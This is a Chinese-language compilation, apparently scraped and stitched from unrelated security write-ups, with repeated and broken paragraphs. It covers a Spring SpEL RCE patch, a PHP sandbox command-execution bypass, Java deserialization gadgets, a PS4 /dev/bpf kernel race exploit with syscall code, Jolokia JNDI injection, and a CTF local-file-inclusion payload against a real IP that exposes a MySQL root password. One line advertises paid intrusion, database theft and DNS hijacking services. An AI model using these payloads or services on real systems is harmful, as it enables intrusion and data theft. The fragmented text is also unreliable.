在
为什么实现了
在执行
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PatchOperation.java:evaluateValueFromTarget()中增减了对路径的验证方法verifyPath(),其中的关键代码是:String pathSource = Arrays.stream(path.split("/"))//
.filter(it -> !it.matches("\\d")) // no digits
.filter(it -> !it.equals("-")) // no "last element"s
.filter(it -> !it.isEmpty()) //
.collect(Collectors.joining("."));为什么实现了
evaluateValueFromTarget()这个方法就能够阻止RCE的攻击呢?之前在漏洞分析中已经说明了,最终执行的是ReplaceOperation:perform(),<T> void perform(Object target, Class<T> type) {
setValueOnTarget(target, evaluateValueFromTarget(target, type));
}在执行
setValueOnTarget()之前先会调用evaluateValueFromTarget(),而这个函数就是父类的函数即PatchOperationevaluateValueFromTarget(),所以通过更改PatchOperation:evaluateValueFromTarget()方法,对PATH路径进行验证,确保PATH的安全性,就能够防止通过SPEL表示执行RCE。渗透爬虫软件 资源采集 劫持域名 提取抓料子 六合·色站·彩票·博彩·金融 接渗透拿站,各大网站数据-拖库-提权联系 域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
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访问后在../sandbox/生成一个sha1文件夹,然后复制模板进去,提供了重定向到该文件夹和重置文件夹的功能
重定向后是个php沙箱,只能执行格式为`xxxx();`的函数
可以递归执行函数,不允许带参数
?cmd=print(readdir(opendir(getcwd()))); 可以列目录
?cmd=print(readfile(readdir(opendir(getcwd())))); 读文件
?cmd=print(dirname(dirname(getcwd()))); print出/var/www
找到`getallheaders()`函数,会返回所有的http请求头,因为header可控,所以可执行任意命令了
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重定向后是个php沙箱,只能执行格式为`xxxx();`的函数
可以递归执行函数,不允许带参数
?cmd=print(readdir(opendir(getcwd()))); 可以列目录
?cmd=print(readfile(readdir(opendir(getcwd())))); 读文件
?cmd=print(dirname(dirname(getcwd()))); print出/var/www
找到`getallheaders()`函数,会返回所有的http请求头,因为header可控,所以可执行任意命令了
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生成重置密码链接中的key参数加密过程:
/upload/Application/Home/Controller/MembersController.class.php
$str 字符串:‘e=$email&k=$key&t=$time’
这里的 $time 是第一个不可控点,但是通过在发送请求前和成功收到响应后记录记录时间可以将 $time 控制在一个很小的范围,即使考虑本地和服务器获取的时间区别前后各加上5秒的延迟补偿,时间范围最差也在20秒以内。
C(‘PWDHASH’) 是网站程序加密过程的私钥,
在安装时随机生成 /upload/Application/Common/Common/function.php
$encrypt_key 是加密过程中的第2个不可控点,简记为en,共32000种可能。for循环加密过程很简单,将txt字符串和en字符串逐位异或的结果与en字符串逐位拼接,当下标走到32时,en的指针归0(因为en字符串只有32位,而通过简单判断txt字符串长度肯定超过32位),最后生成的tmp,记作tmp1字符串如下:
/upload/Application/Common/Common/function.php
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/upload/Application/Home/Controller/MembersController.class.php
$str 字符串:‘e=$email&k=$key&t=$time’
这里的 $time 是第一个不可控点,但是通过在发送请求前和成功收到响应后记录记录时间可以将 $time 控制在一个很小的范围,即使考虑本地和服务器获取的时间区别前后各加上5秒的延迟补偿,时间范围最差也在20秒以内。
C(‘PWDHASH’) 是网站程序加密过程的私钥,
在安装时随机生成 /upload/Application/Common/Common/function.php
$encrypt_key 是加密过程中的第2个不可控点,简记为en,共32000种可能。for循环加密过程很简单,将txt字符串和en字符串逐位异或的结果与en字符串逐位拼接,当下标走到32时,en的指针归0(因为en字符串只有32位,而通过简单判断txt字符串长度肯定超过32位),最后生成的tmp,记作tmp1字符串如下:
/upload/Application/Common/Common/function.php
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在构造payload 中,利用了 AnnotationInvocationHandler提供的 equals方法的默认实现,来触发对Tempaltes接口中 getOutputProperties()或 newTransformer()的调用,来具体看一下
AnnotationInvocationHandler 位于 sun.reflect.annotation 包中,用于 Annotation 的动态代理,其定义如下
可以看到实现了InvocationHandler和 Serializable两个接口,根据 Dynamic Proxy 部分的介绍,使用 AnnotationInvocationHandler 创建的 proxy object 的所有方法调用都会变成对 invoke 方法的调用,来看一下方法的实现
图片 可以看到当调用方法名为equals时,且参数个数和类型匹配,则调用内部equalsImpl方法
跟入后可以看到,首先获取typeClass 所有声明的方法,然后在参数Object o 上使用反射调用方法,因此前面所说TemplatesImpl 实例是需要作为参数传入
理一下思路
根据TemplatesImpl 部分的说明,创建一个包含恶意代码的TemplatesImpl 实例evilTemplates
使用AnnotationInvocationHandler 创建proxy object 代理Templates 接口 (会使用到反射)
调用proxy object 的equals方法,将 evilTemplates作为参数
示例代码如下,运行即可弹出计算器
这里结合了TemplatesImpl和 AnnotationInvocationHandler,将包含恶意代码的Templates 对象作为参数,手动调用equals方法来触发代码执行,所以还是需要再找到一个能够在反序列化过程中,满足这一条件的场景,我们来继续看第三个关键的类
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AnnotationInvocationHandler 位于 sun.reflect.annotation 包中,用于 Annotation 的动态代理,其定义如下
可以看到实现了InvocationHandler和 Serializable两个接口,根据 Dynamic Proxy 部分的介绍,使用 AnnotationInvocationHandler 创建的 proxy object 的所有方法调用都会变成对 invoke 方法的调用,来看一下方法的实现
图片 可以看到当调用方法名为equals时,且参数个数和类型匹配,则调用内部equalsImpl方法
跟入后可以看到,首先获取typeClass 所有声明的方法,然后在参数Object o 上使用反射调用方法,因此前面所说TemplatesImpl 实例是需要作为参数传入
理一下思路
根据TemplatesImpl 部分的说明,创建一个包含恶意代码的TemplatesImpl 实例evilTemplates
使用AnnotationInvocationHandler 创建proxy object 代理Templates 接口 (会使用到反射)
调用proxy object 的equals方法,将 evilTemplates作为参数
示例代码如下,运行即可弹出计算器
这里结合了TemplatesImpl和 AnnotationInvocationHandler,将包含恶意代码的Templates 对象作为参数,手动调用equals方法来触发代码执行,所以还是需要再找到一个能够在反序列化过程中,满足这一条件的场景,我们来继续看第三个关键的类
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为了设置攻击过程中的损坏部分,我们需要打开两个 /dev/bpf 实例。然后,我们会将它们绑定到一个有效的接口——绑定的接口取决于系统与网络的连接方式。如果是有线(以太网)连接,则需要绑定到“eth0”接口;如果是无线连接,则需要绑定到“wlan0”接口。该漏洞利用程序会通过执行测试自动确定要使用的接口。测试本质上是尝试连接到
然后对第二个设备重复相同的过程。
并行设置过滤器
为了造成内存损坏,我们需要两个并行运行的线程,它们不断地在各自的设备上设置过滤器。最终,有效的过滤器会被释放(free()),重新分配内存,并被无效的过滤器所覆盖。为此,每个线程实际上执行以下操作(伪代码):
触发代码执行
因此,我们可以破坏过滤器并替换成无效指令,但我们需要过滤器实际运行,才能通过被破坏的返回地址触发代码执行。由于我们设置的是“写”过滤器,
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write()指定的接口,如果接口无效,write()则会失败并返回 -1。如果在绑定到“eth0”接口后出现这种情况,漏洞利用程序会尝试重新绑定到“wlan0”接口并再次检查。如果write()再次返回 -1,则漏洞利用程序会中止并报告绑定设备失败。// Open first device and bind
var fd1 = p.syscall("sys_open", stringify("/dev/bpf"), 2, 0); // 0666 permissions, open as O_RDWR
p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("eth0")); // 8020426C = BIOCSETIF
if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("wlan0"));
if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
throw "Failed to bind to first /dev/bpf device!";
}
}
然后对第二个设备重复相同的过程。
并行设置过滤器
为了造成内存损坏,我们需要两个并行运行的线程,它们不断地在各自的设备上设置过滤器。最终,有效的过滤器会被释放(free()),重新分配内存,并被无效的过滤器所覆盖。为此,每个线程实际上执行以下操作(伪代码):
// 0x8010427B = BIOCSETWF
void threadOne() // Sets a valid program
{
for(;;)
{
ioctl(fd1, 0x8010427B, bpf_valid_program);
}
}
void threadTwo() // Sets an invalid program
{
for(;;)
{
ioctl(fd2, 0x8010427B, bpf_invalid_program);
}
}
触发代码执行
因此,我们可以破坏过滤器并替换成无效指令,但我们需要过滤器实际运行,才能通过被破坏的返回地址触发代码执行。由于我们设置的是“写”过滤器,
bpfwrite()因此它是执行此操作的理想选择。这意味着我们需要第三个线程运行,该线程会不断跳转write()到第一个 BPF 设备。当过滤器最终被破坏时,下一个线程write()将运行无效的过滤器,导致堆栈内存被破坏,并跳转到我们指定的任何地址,从而使我们能够(相当轻松地)在 ring0 中执行代码。void threadThree() // Tries to trigger code execution
{
void *scratch = (void *)malloc(0x200);
for(;;)
{
uint64_t n = write(fd1, scratch, 0x200);
if(n == 0x200))
{
break;
}
}
}
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Jolokia 支持一个叫做代理模式(Proxy Mode)的东西,是为了解决不能将 Jolokia Agent 部署在目标平台上的问题。具体架构如下:
可以通过向 Jolokia 发送 POST 请求来触发:
熟悉 Java 安全的朋友可能会注意到,这里可能有一个 JNDI 注入。的确,在 WAR Agent 的情况下,此处存在一个 JNDI 注入,问题发生在
当 Web Container 将请求的交由
那么,攻击者只需发送一个带有 Evil JMXRMI 的地址的 JSON,即可利用 JNDI 在目标机器上执行命令。
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可以通过向 Jolokia 发送 POST 请求来触发:
熟悉 Java 安全的朋友可能会注意到,这里可能有一个 JNDI 注入。的确,在 WAR Agent 的情况下,此处存在一个 JNDI 注入,问题发生在
agent\jsr160\src\main\java\org\jolokia\jsr160\Jsr160RequestDispatcher.java:当 Web Container 将请求的交由
Jsr160RequestDispatcher 处理时,Jolokia Agent 创建连接,导致 JNDI 注入。在 WAR Agent 里,默认是由 Jsr160RequestDispatcher 处理的,这一点在 web.xml 也有体现:那么,攻击者只需发送一个带有 Evil JMXRMI 的地址的 JSON,即可利用 JNDI 在目标机器上执行命令。
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分析泄露的源代码,我们发现其
现在,我们可以使用此有效载荷读取系统上我们用户拥有权限的任何文件:
提供的Dockerfile显示了一些有趣的信息和文件路径,我们可以使用 LFI 读取这些信息和文件路径。
首先, docker 容器会确认php、apache 和 mysql
找到了MySQL用户密码和一些系统信息。
MySQL root 密码:
我们还尝试对常用路径、/proc、文件描述符等进行模糊测试,以获取有关系统的更多信息。
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http://47.97.221.96:23333/index.php?action=login存在本地文件包含漏洞。现在,我们可以使用此有效载荷读取系统上我们用户拥有权限的任何文件:
http://47.97.221.96:23333/index.php?action=../../etc/passwd提供的Dockerfile显示了一些有趣的信息和文件路径,我们可以使用 LFI 读取这些信息和文件路径。
首先, docker 容器会确认php、apache 和 mysql
FROM andreisamuilik/php5.5.9-apache2.4-mysql5.5的版本。找到了MySQL用户密码和一些系统信息。
MySQL root 密码:
root / Nu1Lctf%#~:p我们还尝试对常用路径、/proc、文件描述符等进行模糊测试,以获取有关系统的更多信息。
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